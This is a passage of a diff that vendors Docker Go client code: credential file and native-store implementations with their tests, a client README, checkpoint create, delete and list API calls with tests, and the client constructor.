s1: { + Auth: "super_secret_token", + Email: "foo@example.com", + ServerAddress: "https://example.com", + }, + s2: { + Auth: "super_secret_token2", + Email: "foo@example2.com", + ServerAddress: "https://example2.com", + }, + }) + + s := NewFileStore(f) + as, err := s.GetAll() + if err != nil { + t.Fatal(err) + } + if len(as) != 2 { + t.Fatalf("wanted 2, got %d", len(as)) + } + if as[s1].Auth != "super_secret_token" { + t.Fatalf("expected auth `super_secret_token`, got %s", as[s1].Auth) + } + if as[s1].Email != "foo@example.com" { + t.Fatalf("expected email `foo@example.com`, got %s", as[s1].Email) + } + if as[s2].Auth != "super_secret_token2" { + t.Fatalf("expected auth `super_secret_token2`, got %s", as[s2].Auth) + } + if as[s2].Email != "foo@example2.com" { + t.Fatalf("expected email `foo@example2.com`, got %s", as[s2].Email) + } +} + +func TestFileStoreErase(t *testing.T) { + f := newConfigFile(map[string]types.AuthConfig{ + "https://example.com": { + Auth: "super_secret_token", + Email: "foo@example.com", + ServerAddress: "https://example.com", + }, + }) + + s := NewFileStore(f) + err := s.Erase("https://example.com") + if err != nil { + t.Fatal(err) + } + + // file store never returns errors, check that the auth config is empty + a, err := s.Get("https://example.com") + if err != nil { + t.Fatal(err) + } + + if a.Auth != "" { + t.Fatalf("expected empty auth token, got %s", a.Auth) + } + if a.Email != "" { + t.Fatalf("expected empty email, got %s", a.Email) + } +} diff --git a/vendor/github.com/docker/docker/cliconfig/credentials/native_store.go b/vendor/github.com/docker/docker/cliconfig/credentials/native_store.go new file mode 100644 index 0000000000..dec2dbcb82 --- /dev/null +++ b/vendor/github.com/docker/docker/cliconfig/credentials/native_store.go @@ -0,0 +1,144 @@ +package credentials + +import ( + "github.com/docker/docker-credential-helpers/client" + "github.com/docker/docker-credential-helpers/credentials" + "github.com/docker/docker/api/types" + "github.com/docker/docker/cliconfig/configfile" +) + +const ( + remoteCredentialsPrefix = "docker-credential-" + tokenUsername = "" +) + +// nativeStore implements a credentials store +// using native keychain to keep credentials secure. +// It piggybacks into a file store to keep users' emails. +type nativeStore struct { + programFunc client.ProgramFunc + fileStore Store +} + +// NewNativeStore creates a new native store that +// uses a remote helper program to manage credentials. +func NewNativeStore(file *configfile.ConfigFile, helperSuffix string) Store { + name := remoteCredentialsPrefix + helperSuffix + return &nativeStore{ + programFunc: client.NewShellProgramFunc(name), + fileStore: NewFileStore(file), + } +} + +// Erase removes the given credentials from the native store. +func (c *nativeStore) Erase(serverAddress string) error { + if err := client.Erase(c.programFunc, serverAddress); err != nil { + return err + } + + // Fallback to plain text store to remove email + return c.fileStore.Erase(serverAddress) +} + +// Get retrieves credentials for a specific server from the native store. +func (c *nativeStore) Get(serverAddress string) (types.AuthConfig, error) { + // load user email if it exist or an empty auth config. + auth, _ := c.fileStore.Get(serverAddress) + + creds, err := c.getCredentialsFromStore(serverAddress) + if err != nil { + return auth, err + } + auth.Username = creds.Username + auth.IdentityToken = creds.IdentityToken + auth.Password = creds.Password + + return auth, nil +} + +// GetAll retrieves all the credentials from the native store. +func (c *nativeStore) GetAll() (map[string]types.AuthConfig, error) { + auths, err := c.listCredentialsInStore() + if err != nil { + return nil, err + } + + // Emails are only stored in the file store. + // This call can be safely eliminated when emails are removed. + fileConfigs, _ := c.fileStore.GetAll() + + authConfigs := make(map[string]types.AuthConfig) + for registry := range auths { + creds, err := c.getCredentialsFromStore(registry) + if err != nil { + return nil, err + } + ac, _ := fileConfigs[registry] // might contain Email + ac.Username = creds.Username + ac.Password = creds.Password + ac.IdentityToken = creds.IdentityToken + authConfigs[registry] = ac + } + + return authConfigs, nil +} + +// Store saves the given credentials in the file store. +func (c *nativeStore) Store(authConfig types.AuthConfig) error { + if err := c.storeCredentialsInStore(authConfig); err != nil { + return err + } + authConfig.Username = "" + authConfig.Password = "" + authConfig.IdentityToken = "" + + // Fallback to old credential in plain text to save only the email + return c.fileStore.Store(authConfig) +} + +// storeCredentialsInStore executes the command to store the credentials in the native store. +func (c *nativeStore) storeCredentialsInStore(config types.AuthConfig) error { + creds := &credentials.Credentials{ + ServerURL: config.ServerAddress, + Username: config.Username, + Secret: config.Password, + } + + if config.IdentityToken != "" { + creds.Username = tokenUsername + creds.Secret = config.IdentityToken + } + + return client.Store(c.programFunc, creds) +} + +// getCredentialsFromStore executes the command to get the credentials from the native store. +func (c *nativeStore) getCredentialsFromStore(serverAddress string) (types.AuthConfig, error) { + var ret types.AuthConfig + + creds, err := client.Get(c.programFunc, serverAddress) + if err != nil { + if credentials.IsErrCredentialsNotFound(err) { + // do not return an error if the credentials are not + // in the keyckain. Let docker ask for new credentials. + return ret, nil + } + return ret, err + } + + if creds.Username == tokenUsername { + ret.IdentityToken = creds.Secret + } else { + ret.Password = creds.Secret + ret.Username = creds.Username + } + + ret.ServerAddress = serverAddress + return ret, nil +} + +// listCredentialsInStore returns a listing of stored credentials as a map of +// URL -> username. +func (c *nativeStore) listCredentialsInStore() (map[string]string, error) { + return client.List(c.programFunc) +} diff --git a/vendor/github.com/docker/docker/cliconfig/credentials/native_store_test.go b/vendor/github.com/docker/docker/cliconfig/credentials/native_store_test.go new file mode 100644 index 0000000000..7664faf9e1 --- /dev/null +++ b/vendor/github.com/docker/docker/cliconfig/credentials/native_store_test.go @@ -0,0 +1,355 @@ +package credentials + +import ( + "encoding/json" + "fmt" + "io" + "io/ioutil" + "strings" + "testing" + + "github.com/docker/docker-credential-helpers/client" + "github.com/docker/docker-credential-helpers/credentials" + "github.com/docker/docker/api/types" +) + +const ( + validServerAddress = "https://index.docker.io/v1" + validServerAddress2 = "https://example.com:5002" + invalidServerAddress = "https://foobar.example.com" + missingCredsAddress = "https://missing.docker.io/v1" +) + +var errCommandExited = fmt.Errorf("exited 1") + +// mockCommand simulates interactions between the docker client and a remote +// credentials helper. +// Unit tests inject this mocked command into the remote to control execution. +type mockCommand struct { + arg string + input io.Reader +} + +// Output returns responses from the remote credentials helper. +// It mocks those responses based in the input in the mock. +func (m *mockCommand) Output() ([]byte, error) { + in, err := ioutil.ReadAll(m.input) + if err != nil { + return nil, err + } + inS := string(in) + + switch m.arg { + case "erase": + switch inS { + case validServerAddress: + return nil, nil + default: + return []byte("program failed"), errCommandExited + } + case "get": + switch inS { + case validServerAddress: + return []byte(`{"Username": "foo", "Secret": "bar"}`), nil + case validServerAddress2: + return []byte(`{"Username": "", "Secret": "abcd1234"}`), nil + case missingCredsAddress: + return []byte(credentials.NewErrCredentialsNotFound().Error()), errCommandExited + case invalidServerAddress: + return []byte("program failed"), errCommandExited + } + case "store": + var c credentials.Credentials + err := json.NewDecoder(strings.NewReader(inS)).Decode(&c) + if err != nil { + return []byte("program failed"), errCommandExited + } + switch c.ServerURL { + case validServerAddress: + return nil, nil + default: + return []byte("program failed"), errCommandExited + } + case "list": + return []byte(fmt.Sprintf(`{"%s": "%s", "%s": "%s"}`, validServerAddress, "foo", validServerAddress2, "")), nil + } + + return []byte(fmt.Sprintf("unknown argument %q with %q", m.arg, inS)), errCommandExited +} + +// Input sets the input to send to a remote credentials helper. +func (m *mockCommand) Input(in io.Reader) { + m.input = in +} + +func mockCommandFn(args ...string) client.Program { + return &mockCommand{ + arg: args[0], + } +} + +func TestNativeStoreAddCredentials(t *testing.T) { + f := newConfigFile(make(map[string]types.AuthConfig)) + f.CredentialsStore = "mock" + + s := &nativeStore{ + programFunc: mockCommandFn, + fileStore: NewFileStore(f), + } + err := s.Store(types.AuthConfig{ + Username: "foo", + Password: "bar", + Email: "foo@example.com", + ServerAddress: validServerAddress, + }) + + if err != nil { + t.Fatal(err) + } + + if len(f.AuthConfigs) != 1 { + t.Fatalf("expected 1 auth config, got %d", len(f.AuthConfigs)) + } + + a, ok := f.AuthConfigs[validServerAddress] + if !ok { + t.Fatalf("expected auth for %s, got %v", validServerAddress, f.AuthConfigs) + } + if a.Auth != "" { + t.Fatalf("expected auth to be empty, got %s", a.Auth) + } + if a.Username != "" { + t.Fatalf("expected username to be empty, got %s", a.Username) + } + if a.Password != "" { + t.Fatalf("expected password to be empty, got %s", a.Password) + } + if a.IdentityToken != "" { + t.Fatalf("expected identity token to be empty, got %s", a.IdentityToken) + } + if a.Email != "foo@example.com" { + t.Fatalf("expected email `foo@example.com`, got %s", a.Email) + } +} + +func TestNativeStoreAddInvalidCredentials(t *testing.T) { + f := newConfigFile(make(map[string]types.AuthConfig)) + f.CredentialsStore = "mock" + + s := &nativeStore{ + programFunc: mockCommandFn, + fileStore: NewFileStore(f), + } + err := s.Store(types.AuthConfig{ + Username: "foo", + Password: "bar", + Email: "foo@example.com", + ServerAddress: invalidServerAddress, + }) + + if err == nil { + t.Fatal("expected error, got nil") + } + + if !strings.Contains(err.Error(), "program failed") { + t.Fatalf("expected `program failed`, got %v", err) + } + + if len(f.AuthConfigs) != 0 { + t.Fatalf("expected 0 auth config, got %d", len(f.AuthConfigs)) + } +} + +func TestNativeStoreGet(t *testing.T) { + f := newConfigFile(map[string]types.AuthConfig{ + validServerAddress: { + Email: "foo@example.com", + }, + }) + f.CredentialsStore = "mock" + + s := &nativeStore{ + programFunc: mockCommandFn, + fileStore: NewFileStore(f), + } + a, err := s.Get(validServerAddress) + if err != nil { + t.Fatal(err) + } + + if a.Username != "foo" { + t.Fatalf("expected username `foo`, got %s", a.Username) + } + if a.Password != "bar" { + t.Fatalf("expected password `bar`, got %s", a.Password) + } + if a.IdentityToken != "" { + t.Fatalf("expected identity token to be empty, got %s", a.IdentityToken) + } + if a.Email != "foo@example.com" { + t.Fatalf("expected email `foo@example.com`, got %s", a.Email) + } +} + +func TestNativeStoreGetIdentityToken(t *testing.T) { + f := newConfigFile(map[string]types.AuthConfig{ + validServerAddress2: { + Email: "foo@example2.com", + }, + }) + f.CredentialsStore = "mock" + + s := &nativeStore{ + programFunc: mockCommandFn, + fileStore: NewFileStore(f), + } + a, err := s.Get(validServerAddress2) + if err != nil { + t.Fatal(err) + } + + if a.Username != "" { + t.Fatalf("expected username to be empty, got %s", a.Username) + } + if a.Password != "" { + t.Fatalf("expected password to be empty, got %s", a.Password) + } + if a.IdentityToken != "abcd1234" { + t.Fatalf("expected identity token `abcd1234`, got %s", a.IdentityToken) + } + if a.Email != "foo@example2.com" { + t.Fatalf("expected email `foo@example2.com`, got %s", a.Email) + } +} + +func TestNativeStoreGetAll(t *testing.T) { + f := newConfigFile(map[string]types.AuthConfig{ + validServerAddress: { + Email: "foo@example.com", + }, + }) + f.CredentialsStore = "mock" + + s := &nativeStore{ + programFunc: mockCommandFn, + fileStore: NewFileStore(f), + } + as, err := s.GetAll() + if err != nil { + t.Fatal(err) + } + + if len(as) != 2 { + t.Fatalf("wanted 2, got %d", len(as)) + } + + if as[validServerAddress].Username != "foo" { + t.Fatalf("expected username `foo` for %s, got %s", validServerAddress, as[validServerAddress].Username) + } + if as[validServerAddress].Password != "bar" { + t.Fatalf("expected password `bar` for %s, got %s", validServerAddress, as[validServerAddress].Password) + } + if as[validServerAddress].IdentityToken != "" { + t.Fatalf("expected identity to be empty for %s, got %s", validServerAddress, as[validServerAddress].IdentityToken) + } + if as[validServerAddress].Email != "foo@example.com" { + t.Fatalf("expected email `foo@example.com` for %s, got %s", validServerAddress, as[validServerAddress].Email) + } + if as[validServerAddress2].Username != "" { + t.Fatalf("expected username to be empty for %s, got %s", validServerAddress2, as[validServerAddress2].Username) + } + if as[validServerAddress2].Password != "" { + t.Fatalf("expected password to be empty for %s, got %s", validServerAddress2, as[validServerAddress2].Password) + } + if as[validServerAddress2].IdentityToken != "abcd1234" { + t.Fatalf("expected identity token `abcd1324` for %s, got %s", validServerAddress2, as[validServerAddress2].IdentityToken) + } + if as[validServerAddress2].Email != "" { + t.Fatalf("expected no email for %s, got %s", validServerAddress2, as[validServerAddress2].Email) + } +} + +func TestNativeStoreGetMissingCredentials(t *testing.T) { + f := newConfigFile(map[string]types.AuthConfig{ + validServerAddress: { + Email: "foo@example.com", + }, + }) + f.CredentialsStore = "mock" + + s := &nativeStore{ + programFunc: mockCommandFn, + fileStore: NewFileStore(f), + } + _, err := s.Get(missingCredsAddress) + if err != nil { + // missing credentials do not produce an error + t.Fatal(err) + } +} + +func TestNativeStoreGetInvalidAddress(t *testing.T) { + f := newConfigFile(map[string]types.AuthConfig{ + validServerAddress: { + Email: "foo@example.com", + }, + }) + f.CredentialsStore = "mock" + + s := &nativeStore{ + programFunc: mockCommandFn, + fileStore: NewFileStore(f), + } + _, err := s.Get(invalidServerAddress) + if err == nil { + t.Fatal("expected error, got nil") + } + + if !strings.Contains(err.Error(), "program failed") { + t.Fatalf("expected `program failed`, got %v", err) + } +} + +func TestNativeStoreErase(t *testing.T) { + f := newConfigFile(map[string]types.AuthConfig{ + validServerAddress: { + Email: "foo@example.com", + }, + }) + f.CredentialsStore = "mock" + + s := &nativeStore{ + programFunc: mockCommandFn, + fileStore: NewFileStore(f), + } + err := s.Erase(validServerAddress) + if err != nil { + t.Fatal(err) + } + + if len(f.AuthConfigs) != 0 { + t.Fatalf("expected 0 auth configs, got %d", len(f.AuthConfigs)) + } +} + +func TestNativeStoreEraseInvalidAddress(t *testing.T) { + f := newConfigFile(map[string]types.AuthConfig{ + validServerAddress: { + Email: "foo@example.com", + }, + }) + f.CredentialsStore = "mock" + + s := &nativeStore{ + programFunc: mockCommandFn, + fileStore: NewFileStore(f), + } + err := s.Erase(invalidServerAddress) + if err == nil { + t.Fatal("expected error, got nil") + } + + if !strings.Contains(err.Error(), "program failed") { + t.Fatalf("expected `program failed`, got %v", err) + } +} diff --git a/vendor/github.com/docker/docker/client/README.md b/vendor/github.com/docker/docker/client/README.md new file mode 100644 index 0000000000..059dfb3ce7 --- /dev/null +++ b/vendor/github.com/docker/docker/client/README.md @@ -0,0 +1,35 @@ +# Go client for the Docker Engine API + +The `docker` command uses this package to communicate with the daemon. It can also be used by your own Go applications to do anything the command-line interface does – running containers, pulling images, managing swarms, etc. + +For example, to list running containers (the equivalent of `docker ps`): + +```go +package main + +import ( + "context" + "fmt" + + "github.com/docker/docker/api/types" + "github.com/docker/docker/client" +) + +func main() { + cli, err := client.NewEnvClient() + if err != nil { + panic(err) + } + + containers, err := cli.ContainerList(context.Background(), types.ContainerListOptions{}) + if err != nil { + panic(err) + } + + for _, container := range containers { + fmt.Printf("%s %s\n", container.ID[:10], container.Image) + } +} +``` + +[Full documentation is available on GoDoc.](https://godoc.org/github.com/docker/docker/client) diff --git a/vendor/github.com/docker/docker/client/checkpoint_create.go b/vendor/github.com/docker/docker/client/checkpoint_create.go new file mode 100644 index 0000000000..0effe498be --- /dev/null +++ b/vendor/github.com/docker/docker/client/checkpoint_create.go @@ -0,0 +1,13 @@ +package client + +import ( + "github.com/docker/docker/api/types" + "golang.org/x/net/context" +) + +// CheckpointCreate creates a checkpoint from the given container with the given name +func (cli *Client) CheckpointCreate(ctx context.Context, container string, options types.CheckpointCreateOptions) error { + resp, err := cli.post(ctx, "/containers/"+container+"/checkpoints", nil, options, nil) + ensureReaderClosed(resp) + return err +} diff --git a/vendor/github.com/docker/docker/client/checkpoint_create_test.go b/vendor/github.com/docker/docker/client/checkpoint_create_test.go new file mode 100644 index 0000000000..96e5187618 --- /dev/null +++ b/vendor/github.com/docker/docker/client/checkpoint_create_test.go @@ -0,0 +1,73 @@ +package client + +import ( + "bytes" + "encoding/json" + "fmt" + "io/ioutil" + "net/http" + "strings" + "testing" + + "github.com/docker/docker/api/types" + "golang.org/x/net/context" +) + +func TestCheckpointCreateError(t *testing.T) { + client := &Client{ + client: newMockClient(errorMock(http.StatusInternalServerError, "Server error")), + } + err := client.CheckpointCreate(context.Background(), "nothing", types.CheckpointCreateOptions{ + CheckpointID: "noting", + Exit: true, + }) + + if err == nil || err.Error() != "Error response from daemon: Server error" { + t.Fatalf("expected a Server Error, got %v", err) + } +} + +func TestCheckpointCreate(t *testing.T) { + expectedContainerID := "container_id" + expectedCheckpointID := "checkpoint_id" + expectedURL := "/containers/container_id/checkpoints" + + client := &Client{ + client: newMockClient(func(req *http.Request) (*http.Response, error) { + if !strings.HasPrefix(req.URL.Path, expectedURL) { + return nil, fmt.Errorf("Expected URL '%s', got '%s'", expectedURL, req.URL) + } + + if req.Method != "POST" { + return nil, fmt.Errorf("expected POST method, got %s", req.Method) + } + + createOptions := &types.CheckpointCreateOptions{} + if err := json.NewDecoder(req.Body).Decode(createOptions); err != nil { + return nil, err + } + + if createOptions.CheckpointID != expectedCheckpointID { + return nil, fmt.Errorf("expected CheckpointID to be 'checkpoint_id', got %v", createOptions.CheckpointID) + } + + if !createOptions.Exit { + return nil, fmt.Errorf("expected Exit to be true") + } + + return &http.Response{ + StatusCode: http.StatusOK, + Body: ioutil.NopCloser(bytes.NewReader([]byte(""))), + }, nil + }), + } + + err := client.CheckpointCreate(context.Background(), expectedContainerID, types.CheckpointCreateOptions{ + CheckpointID: expectedCheckpointID, + Exit: true, + }) + + if err != nil { + t.Fatal(err) + } +} diff --git a/vendor/github.com/docker/docker/client/checkpoint_delete.go b/vendor/github.com/docker/docker/client/checkpoint_delete.go new file mode 100644 index 0000000000..e6e75588b1 --- /dev/null +++ b/vendor/github.com/docker/docker/client/checkpoint_delete.go @@ -0,0 +1,20 @@ +package client + +import ( + "net/url" + + "github.com/docker/docker/api/types" + "golang.org/x/net/context" +) + +// CheckpointDelete deletes the checkpoint with the given name from the given container +func (cli *Client) CheckpointDelete(ctx context.Context, containerID string, options types.CheckpointDeleteOptions) error { + query := url.Values{} + if options.CheckpointDir != "" { + query.Set("dir", options.CheckpointDir) + } + + resp, err := cli.delete(ctx, "/containers/"+containerID+"/checkpoints/"+options.CheckpointID, query, nil) + ensureReaderClosed(resp) + return err +} diff --git a/vendor/github.com/docker/docker/client/checkpoint_delete_test.go b/vendor/github.com/docker/docker/client/checkpoint_delete_test.go new file mode 100644 index 0000000000..a78b050487 --- /dev/null +++ b/vendor/github.com/docker/docker/client/checkpoint_delete_test.go @@ -0,0 +1,54 @@ +package client + +import ( + "bytes" + "fmt" + "io/ioutil" + "net/http" + "strings" + "testing" + + "github.com/docker/docker/api/types" + "golang.org/x/net/context" +) + +func TestCheckpointDeleteError(t *testing.T) { + client := &Client{ + client: newMockClient(errorMock(http.StatusInternalServerError, "Server error")), + } + + err := client.CheckpointDelete(context.Background(), "container_id", types.CheckpointDeleteOptions{ + CheckpointID: "checkpoint_id", + }) + + if err == nil || err.Error() != "Error response from daemon: Server error" { + t.Fatalf("expected a Server Error, got %v", err) + } +} + +func TestCheckpointDelete(t *testing.T) { + expectedURL := "/containers/container_id/checkpoints/checkpoint_id" + + client := &Client{ + client: newMockClient(func(req *http.Request) (*http.Response, error) { + if !strings.HasPrefix(req.URL.Path, expectedURL) { + return nil, fmt.Errorf("Expected URL '%s', got '%s'", expectedURL, req.URL) + } + if req.Method != "DELETE" { + return nil, fmt.Errorf("expected DELETE method, got %s", req.Method) + } + return &http.Response{ + StatusCode: http.StatusOK, + Body: ioutil.NopCloser(bytes.NewReader([]byte(""))), + }, nil + }), + } + + err := client.CheckpointDelete(context.Background(), "container_id", types.CheckpointDeleteOptions{ + CheckpointID: "checkpoint_id", + }) + + if err != nil { + t.Fatal(err) + } +} diff --git a/vendor/github.com/docker/docker/client/checkpoint_list.go b/vendor/github.com/docker/docker/client/checkpoint_list.go new file mode 100644 index 0000000000..8eb720a6b2 --- /dev/null +++ b/vendor/github.com/docker/docker/client/checkpoint_list.go @@ -0,0 +1,28 @@ +package client + +import ( + "encoding/json" + "net/url" + + "github.com/docker/docker/api/types" + "golang.org/x/net/context" +) + +// CheckpointList returns the volumes configured in the docker host. +func (cli *Client) CheckpointList(ctx context.Context, container string, options types.CheckpointListOptions) ([]types.Checkpoint, error) { + var checkpoints []types.Checkpoint + + query := url.Values{} + if options.CheckpointDir != "" { + query.Set("dir", options.CheckpointDir) + } + + resp, err := cli.get(ctx, "/containers/"+container+"/checkpoints", query, nil) + if err != nil { + return checkpoints, err + } + + err = json.NewDecoder(resp.body).Decode(&checkpoints) + ensureReaderClosed(resp) + return checkpoints, err +} diff --git a/vendor/github.com/docker/docker/client/checkpoint_list_test.go b/vendor/github.com/docker/docker/client/checkpoint_list_test.go new file mode 100644 index 0000000000..6c90f61e8c --- /dev/null +++ b/vendor/github.com/docker/docker/client/checkpoint_list_test.go @@ -0,0 +1,57 @@ +package client + +import ( + "bytes" + "encoding/json" + "fmt" + "io/ioutil" + "net/http" + "strings" + "testing" + + "github.com/docker/docker/api/types" + "golang.org/x/net/context" +) + +func TestCheckpointListError(t *testing.T) { + client := &Client{ + client: newMockClient(errorMock(http.StatusInternalServerError, "Server error")), + } + + _, err := client.CheckpointList(context.Background(), "container_id", types.CheckpointListOptions{}) + if err == nil || err.Error() != "Error response from daemon: Server error" { + t.Fatalf("expected a Server Error, got %v", err) + } +} + +func TestCheckpointList(t *testing.T) { + expectedURL := "/containers/container_id/checkpoints" + + client := &Client{ + client: newMockClient(func(req *http.Request) (*http.Response, error) { + if !strings.HasPrefix(req.URL.Path, expectedURL) { + return nil, fmt.Errorf("Expected URL '%s', got '%s'", expectedURL, req.URL) + } + content, err := json.Marshal([]types.Checkpoint{ + { + Name: "checkpoint", + }, + }) + if err != nil { + return nil, err + } + return &http.Response{ + StatusCode: http.StatusOK, + Body: ioutil.NopCloser(bytes.NewReader(content)), + }, nil + }), + } + + checkpoints, err := client.CheckpointList(context.Background(), "container_id", types.CheckpointListOptions{}) + if err != nil { + t.Fatal(err) + } + if len(checkpoints) != 1 { + t.Fatalf("expected 1 checkpoint, got %v", checkpoints) + } +} diff --git a/vendor/github.com/docker/docker/client/client.go b/vendor/github.com/docker/docker/client/client.go new file mode 100644 index 0000000000..a9bdab6bb6 --- /dev/null +++ b/vendor/github.com/docker/docker/client/client.go @@ -0,0 +1,246 @@ +/* +Package client is a Go client for the Docker Engine API. + +The "docker" command uses this package to communicate with the daemon. It can also +be used by your own Go applications to do anything the command-line interface does +– running containers, pulling images, managing swarms, etc. + +For more information about the Engine API, see the documentation: +https://docs.docker.com/engine/reference/api/ + +Usage + +You use the library by creating a client object and calling methods on it. The +client can be created either from environment variables with NewEnvClient, or +configured manually with NewClient. + +For example, to list running containers (the equivalent of "docker ps"): + + package main + + import ( + "context" + "fmt" + + "github.com/docker/docker/api/types" + "github.com/docker/docker/client" + ) + + func main() { + cli, err := client.NewEnvClient() + if err != nil { + panic(err) + } + + containers, err := cli.ContainerList(context.Background(), types.ContainerListOptions{}) + if err != nil { + panic(err) + } + + for _, container := range containers { + fmt.Printf("%s %s\n", container.ID[:10], container.Image) + } + } + +*/ +package client + +import ( + "fmt" + "net/http" + "net/url" + "os" + "path/filepath" + "strings" + + "github.com/docker/go-connections/sockets" + "github.com/docker/go-connections/tlsconfig" +) + +// DefaultVersion is the version of the current stable API +const DefaultVersion string = "1.25" + +// Client is the API client that performs all operations +// against a docker server. +type Client struct { + // scheme sets the scheme for the client + scheme string + // host holds the server address to connect to + host string + // proto holds the client protocol i.e. unix. + proto string + // addr holds the client address. + addr string + // basePath holds the path to prepend to the requests. + basePath string + // client used to send and receive http requests. + client *http.Client + // version of the server to talk to. + version string + // custom http headers configured by users. + customHTTPHeaders map[string]string + // manualOverride is set to true when the version was set by users. + manualOverride bool +} + +// NewEnvClient initializes a new API client based on environment variables. +// Use DOCKER_HOST to set the url to the docker server. +// Use DOCKER_API_VERSION to set the version of the API to reach, leave empty for latest. +// Use DOCKER_CERT_PATH to load the tls certificates from. +// Use DOCKER_TLS_VERIFY to enable or disable TLS verification, off by default. +func NewEnvClient() (*Client, error) { + var client *http.Client + if dockerCertPath := os.Getenv("DOCKER_CERT_PATH"); dockerCertPath != "" { + options := tlsconfig.Options{ + CAFile: filepath.Join(dockerCertPath, "ca.pem"), + CertFile: filepath.Join(dockerCertPath, "cert.pem"), + KeyFile: filepath.Join(dockerCertPath, "key.pem"), + InsecureSkipVerify: os.Getenv("DOCKER_TLS_VERIFY") == "", + } + tlsc, err := tlsconfig.Client(options) + if err != nil { + return nil, err + } + + client = &http.Client{ + Transport: &http.Transport{ + TLSClientConfig: tlsc, + }, + } + } + + host := os.Getenv("DOCKER_HOST") + if host == "" { + host = DefaultDockerHost + } + version := os.Getenv("DOCKER_API_VERSION") + if version == "" { + version = DefaultVersion + } + + cli, err := NewClient(host, version, client, nil) + if err != nil { + return cli, err + } + if os.Getenv("DOCKER_API_VERSION") != "" { + cli.manualOverride = true + } + return cli, nil +} + +// NewClient initializes a new API client for the given host and API version. +// It uses the given http client as transport. +// It also initializes the custom http headers to add to each request. +// +// It won't send any version information if the version number is empty. It is +// highly recommended that you set a version or your client may break if the +// server is upgraded. +func NewClient(host string, version string, client *http.Client, httpHeaders map[string]string) (*Client, error) { + proto, addr, basePath, err := ParseHost(host) + if err != nil { + return nil, err + } + + if client != nil { + if _, ok := client.Transport.(*http.Transport); !ok { + return nil, fmt.Errorf("unable to verify TLS configuration, invalid transport %v", client.Transport) + } + } else { + transport := new(http.Transport) + sockets.ConfigureTransport(transport, proto, addr) + client = &http.Client{ + Transport: transport, + } + } + + scheme := "http" + tlsConfig := resolveTLSConfig(client.Transport) + if tlsConfig != nil { + // TODO(stevvooe): This isn't really the right way to write clients in Go. + // `NewClient` should probably only take an `*http.Client` and work from there. + // Unfortunately, the model of having a host-ish/url-thingy as the connection + // string has us confusing protocol and transport layers. We continue doing + // this to avoid breaking existing clients but this should be addressed. + scheme = "https" + } + + return &Client{ + scheme: scheme, + host: host, + proto: proto, + addr: addr, + basePath: basePath, + client: client, + version: version, + customHTTPHeaders: httpHeaders, + }, nil +} + +// Close ensures that transport.Client is closed +// especially needed while using NewClient with *http.Client = nil +// for example +// client.NewClient("unix:///var/run/docker.sock", nil, "v1.18", map[string]string{"User-Agent": "engine-api-cli-1.0"}) +func (cli *Client) Close() error { + + if t, ok := cli.client.Transport.(*http.Transport); ok { + t.CloseIdleConnections() + } + + return nil +} + +// getAPIPath returns the versioned request path to call the api. +// It appends the query parameters to the path if they are not empty. +func (cli *Client) getAPIPath(p string, query url.Values) string { + var apiPath string + if cli.version != "" { + v := strings.TrimPrefix(cli.version, "v") + apiPath = fmt.Sprintf("%s/v%s%s", cli.basePath, v, p) + } else { + apiPath = fmt.Sprintf("%s%s", cli.basePath, p) + } + + u := &url.URL{ + Path: apiPath, + } + if len(query) > 0 { + u.RawQuery = query.Encode() + } + return u.String() +} + +// ClientVersion returns the version string associated with this +// instance of the Client. Note that this value can be changed +// via the DOCKER_API_VERSION env var. +func (cli *Client) ClientVersion() string { + return cli.version +} + +// UpdateClientVersion updates the version string associated with this +// instance of the Client. +func (cli *Client) UpdateClientVersion(v string) { + if !cli.manualOverride { + cli.version = v + } + +} + +// ParseHost verifies that the given host strings is valid. +func ParseHost(host string) (string, string, string, error) { + protoAddrParts := strings.SplitN(host, "://", 2) + if len(protoAddrParts) == 1 { + return "", "", "", fmt.Errorf("unable to parse docker host `%s`", host) + } + + var basePath string + proto, addr := protoAddrParts[0], protoAddrParts[1] + if proto == "tcp" { + parsed, err := url.Parse("tcp://" + addr) + if err != nil { + return "", "", "", err + } + addr = parsed.Host + basePath = parsed.Path + } + return proto, addr, basePath, nil +} diff --git a/vendor/github.com/docker/docker/client/client_mock_test.go b/vendor/github.com/docker/docker/client/client_mock_test.go new file mode 100644 index 0000000000..0ab935d536 --- /dev/null +++ b/vendor/github.com/docker/docker/client/client_mock_test.go @@ -0,0 +1,45 @@ +package client + +import ( + "bytes" + "encoding/json" + "io/ioutil" + "net/http" + + "github.com/docker/docker/api/types" +) + +func newMockClient(doer func(*http.Request) (*http.Response, error)) *http.Client { + return &http.Client{ + Transport: transportFunc(doer), + } +} + +func errorMock(statusCode int, message string) func(req *http.Request) (*http.Response, error) { + return func(req *http.Request) (*http.Response, error) { + header := http.Header{} + header.Set("Content-Type", "application/json") + + body, err := json.Marshal(&types.ErrorResponse{ + Message: message, + }) + if err != nil { + return nil, err + } + + return &http.Response{ + StatusCode: statusCode, + Body: ioutil.NopCloser(bytes.NewReader(body)), + Header: header, + }, nil + } +} + +func plainTextErrorMock(statusCode int, message string) func(req *http.Request) (*http.Response, error) { + return func(req *http.Request) (*http.Response, error) { + return &http.Response{ + StatusCode: statusCode, + Body: ioutil.NopCloser(bytes.NewReader([]byte(message))), + }, nil + } +} diff --git a/vendor/github.com/docker/docker/client/client_test.go b/vendor/github.com/docker/docker/client/client_test.go new file mode 100644 index 0000000000..ee199c2bec --- /dev/null +++ b/vendor/github.com/docker/docker/client/client_test.go @@ -0,0 +1,283 @@ +package client + +import ( + "bytes" + "encoding/json" + "io/ioutil" + "net/http" + "net/url" + "os" + "runtime" + "strings" + "testing" + + "github.com/docker/docker/api/types" + "golang.org/x/net/context" +) + +func TestNewEnvClient(t *testing.T) { + if runtime.GOOS == "windows" { + t.Skip("skipping unix only test for windows") + } + cases := []struct { + envs map[string]string + expectedError string + expectedVersion string + }{ + { + envs: map[string]string{}, + expectedVersion: DefaultVersion, + }, + { + envs: map[string]string{ + "DOCKER_CERT_PATH": "invalid/path", + }, + expectedError: "Could not load X509 key pair: open invalid/path/cert.pem: no such file or directory. Make sure the key is not encrypted", + }, + { + envs: map[string]string{ + "DOCKER_CERT_PATH": "testdata/", + }, + expectedVersion: DefaultVersion, + }, + { + envs: map[string]string{ + "DOCKER_CERT_PATH": "testdata/", + "DOCKER_TLS_VERIFY": "1", + }, + expectedVersion: DefaultVersion, + }, + { + envs: map[string]string{ + "DOCKER_CERT_PATH": "testdata/", + "DOCKER_HOST": "https://notaunixsocket", + }, + expectedVersion: DefaultVersion, + }, + { + envs: map[string]string{ + "DOCKER_HOST": "host", + }, + expectedError: "unable to parse docker host `host`", + }, + { + envs: map[string]string{ + "DOCKER_HOST": "invalid://url", + }, + expectedVersion: 